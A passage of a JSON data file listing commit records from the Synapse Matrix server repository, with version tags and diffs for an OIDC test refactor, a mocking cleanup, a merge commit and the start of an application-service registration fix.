"v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "8388a7fb3a02e50cd2dded8f7e43235c42ac597b", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608037411, + "hunks": 15, + "message": "Make `_make_callback_with_userinfo` async ... so that we can test its behaviour when it raises. Also pull it out to the top level so that I can use it from other test classes.", + "diff": [ + "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", + "index bd2437501..c54f1c579 100644", + "--- a/tests/handlers/test_oidc.py", + "+++ b/tests/handlers/test_oidc.py", + "@@ -23,2 +23,3 @@ from synapse.handlers.oidc_handler import OidcError", + " from synapse.handlers.sso import MappingException", + "+from synapse.server import HomeServer", + " from synapse.types import UserID", + "@@ -401,3 +402,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " )", + "- request = self._build_callback_request(", + "+ request = _build_callback_request(", + " code, state, session, user_agent=user_agent, ip_address=ip_address", + "@@ -609,3 +610,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " )", + "- request = self._build_callback_request(\"code\", state, session)", + "+ request = _build_callback_request(\"code\", state, session)", + "@@ -626,3 +627,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- self._make_callback_with_userinfo(userinfo)", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + " auth_handler.complete_sso_login.assert_called_once_with(", + "@@ -637,3 +638,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- self._make_callback_with_userinfo(userinfo)", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + " auth_handler.complete_sso_login.assert_called_once_with(", + "@@ -650,3 +651,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " userinfo = {\"sub\": \"test3\", \"username\": \"test_user_3\"}", + "- self._make_callback_with_userinfo(userinfo)", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + " auth_handler.complete_sso_login.assert_not_called()", + "@@ -674,3 +675,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- self._make_callback_with_userinfo(userinfo)", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + " auth_handler.complete_sso_login.assert_called_once_with(", + "@@ -681,3 +682,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " # Subsequent calls should map to the same mxid.", + "- self._make_callback_with_userinfo(userinfo)", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + " auth_handler.complete_sso_login.assert_called_once_with(", + "@@ -696,3 +697,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- self._make_callback_with_userinfo(userinfo)", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + " auth_handler.complete_sso_login.assert_called_once_with(", + "@@ -717,3 +718,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- self._make_callback_with_userinfo(userinfo)", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + " auth_handler.complete_sso_login.assert_not_called()", + "@@ -732,3 +733,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + "- self._make_callback_with_userinfo(userinfo)", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + " auth_handler.complete_sso_login.assert_called_once_with(", + "@@ -739,3 +740,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " \"\"\"If the mapping provider generates an invalid localpart it should be rejected.\"\"\"", + "- self._make_callback_with_userinfo({\"sub\": \"test2\", \"username\": \"f\u00c3\u00b6\u00c3\u00b6\"})", + "+ self.get_success(", + "+ _make_callback_with_userinfo(self.hs, {\"sub\": \"test2\", \"username\": \"f\u00c3\u00b6\u00c3\u00b6\"})", + "+ )", + " self.assertRenderedError(\"mapping_error\", \"localpart is invalid: f\u00c3\u00b6\u00c3\u00b6\")", + "@@ -764,3 +767,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- self._make_callback_with_userinfo(userinfo)", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + "@@ -786,3 +789,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " }", + "- self._make_callback_with_userinfo(userinfo)", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + " auth_handler.complete_sso_login.assert_not_called()", + "@@ -792,60 +795,72 @@ class OidcHandlerTestCase(HomeserverTestCase):", + "- def _make_callback_with_userinfo(", + "- self, userinfo: dict, client_redirect_url: str = \"http://client/redirect\"", + "- ) -> None:", + "- self.handler._exchange_code = simple_async_mock(return_value={})", + "- self.handler._parse_id_token = simple_async_mock(return_value=userinfo)", + "- self.handler._fetch_userinfo = simple_async_mock(return_value=userinfo)", + "- state = \"state\"", + "- session = self.handler._generate_oidc_session_token(", + "- state=state,", + "- nonce=\"nonce\",", + "- client_redirect_url=client_redirect_url,", + "- ui_auth_session_id=None,", + "- )", + "- request = self._build_callback_request(\"code\", state, session)", + "+async def _make_callback_with_userinfo(", + "+ hs: HomeServer, userinfo: dict, client_redirect_url: str = \"http://client/redirect\"", + "+) -> None:", + "+ \"\"\"Mock up an OIDC callback with the given userinfo dict", + "- self.get_success(self.handler.handle_oidc_callback(request))", + "+ We'll pull out the OIDC handler from the homeserver, stub out a couple of methods,", + "+ and poke in the userinfo dict as if it were the response to an OIDC userinfo call.", + "- def _build_callback_request(", + "- self,", + "- code: str,", + "- state: str,", + "- session: str,", + "- user_agent: str = \"Browser\",", + "- ip_address: str = \"10.0.0.1\",", + "- ):", + "- \"\"\"Builds a fake SynapseRequest to mock the browser callback", + "-", + "- Returns a Mock object which looks like the SynapseRequest we get from a browser", + "- after SSO (before we return to the client)", + "-", + "- Args:", + "- code: the authorization code which would have been returned by the OIDC", + "- provider", + "- state: the \"state\" param which would have been passed around in the", + "- query param. Should be the same as was embedded in the session in", + "- _build_oidc_session.", + "- session: the \"session\" which would have been passed around in the cookie.", + "- user_agent: the user-agent to present", + "- ip_address: the IP address to pretend the request came from", + "- \"\"\"", + "- request = Mock(", + "- spec=[", + "- \"args\",", + "- \"getCookie\",", + "- \"addCookie\",", + "- \"requestHeaders\",", + "- \"getClientIP\",", + "- \"get_user_agent\",", + "- ]", + "- )", + "+ Args:", + "+ hs: the HomeServer impl to send the callback to.", + "+ userinfo: the OIDC userinfo dict", + "+ client_redirect_url: the URL to redirect to on success.", + "+ \"\"\"", + "+ handler = hs.get_oidc_handler()", + "+ handler._exchange_code = simple_async_mock(return_value={})", + "+ handler._parse_id_token = simple_async_mock(return_value=userinfo)", + "+ handler._fetch_userinfo = simple_async_mock(return_value=userinfo)", + "- request.getCookie.return_value = session", + "- request.args = {}", + "- request.args[b\"code\"] = [code.encode(\"utf-8\")]", + "- request.args[b\"state\"] = [state.encode(\"utf-8\")]", + "- request.getClientIP.return_value = ip_address", + "- request.get_user_agent.return_value = user_agent", + "- return request", + "+ state = \"state\"", + "+ session = handler._generate_oidc_session_token(", + "+ state=state,", + "+ nonce=\"nonce\",", + "+ client_redirect_url=client_redirect_url,", + "+ ui_auth_session_id=None,", + "+ )", + "+ request = _build_callback_request(\"code\", state, session)", + "+", + "+ await handler.handle_oidc_callback(request)", + "+", + "+", + "+def _build_callback_request(", + "+ code: str,", + "+ state: str,", + "+ session: str,", + "+ user_agent: str = \"Browser\",", + "+ ip_address: str = \"10.0.0.1\",", + "+):", + "+ \"\"\"Builds a fake SynapseRequest to mock the browser callback", + "+", + "+ Returns a Mock object which looks like the SynapseRequest we get from a browser", + "+ after SSO (before we return to the client)", + "+", + "+ Args:", + "+ code: the authorization code which would have been returned by the OIDC", + "+ provider", + "+ state: the \"state\" param which would have been passed around in the", + "+ query param. Should be the same as was embedded in the session in", + "+ _build_oidc_session.", + "+ session: the \"session\" which would have been passed around in the cookie.", + "+ user_agent: the user-agent to present", + "+ ip_address: the IP address to pretend the request came from", + "+ \"\"\"", + "+ request = Mock(", + "+ spec=[", + "+ \"args\",", + "+ \"getCookie\",", + "+ \"addCookie\",", + "+ \"requestHeaders\",", + "+ \"getClientIP\",", + "+ \"get_user_agent\",", + "+ ]", + "+ )", + "+", + "+ request.getCookie.return_value = session", + "+ request.args = {}", + "+ request.args[b\"code\"] = [code.encode(\"utf-8\")]", + "+ request.args[b\"state\"] = [state.encode(\"utf-8\")]", + "+ request.getClientIP.return_value = ip_address", + "+ request.get_user_agent.return_value = user_agent", + "+ return request" + ], + "changed_files": [ + "tests/handlers/test_oidc.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "c1883f042d4e6d69e4c211bcad5d65da5123f33d", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608073203, + "hunks": 1, + "message": "Remove spurious mocking of complete_sso_login The tests that need this all do it already.", + "diff": [ + "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", + "index 1794a169e..bd2437501 100644", + "--- a/tests/handlers/test_oidc.py", + "+++ b/tests/handlers/test_oidc.py", + "@@ -798,4 +798,2 @@ class OidcHandlerTestCase(HomeserverTestCase):", + " self.handler._fetch_userinfo = simple_async_mock(return_value=userinfo)", + "- auth_handler = self.hs.get_auth_handler()", + "- auth_handler.complete_sso_login = simple_async_mock()" + ], + "changed_files": [ + "tests/handlers/test_oidc.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "fd83debcc047efecfb936422684f2c283ecbfe8b", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607513408, + "hunks": 0, + "message": "Merge branch 'master' into develop", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [] + }, + { + "commit_id": "4c33796b20f934a43f4f09a2bac6653c18d72b69", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608209721, + "hunks": 16, + "message": "Correctly handle AS registerations and add test", + "diff": [ + "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", + "index c7dc07008..3b8ac4325 100644", + "--- a/synapse/handlers/auth.py", + "+++ b/synapse/handlers/auth.py", + "@@ -711,2 +711,3 @@ class AuthHandler(BaseHandler):", + " puppets_user_id: Optional[str] = None,", + "+ is_appservice_ghost: bool = False,", + " ) -> str:", + "@@ -727,2 +728,3 @@ class AuthHandler(BaseHandler):", + " no expiry.", + "+ is_appservice_ghost: Whether the user is an application ghost user", + " Returns:", + "@@ -747,3 +749,7 @@ class AuthHandler(BaseHandler):", + "- await self.auth.check_auth_blocking(user_id)", + "+ if (", + "+ not is_appservice_ghost", + "+ or 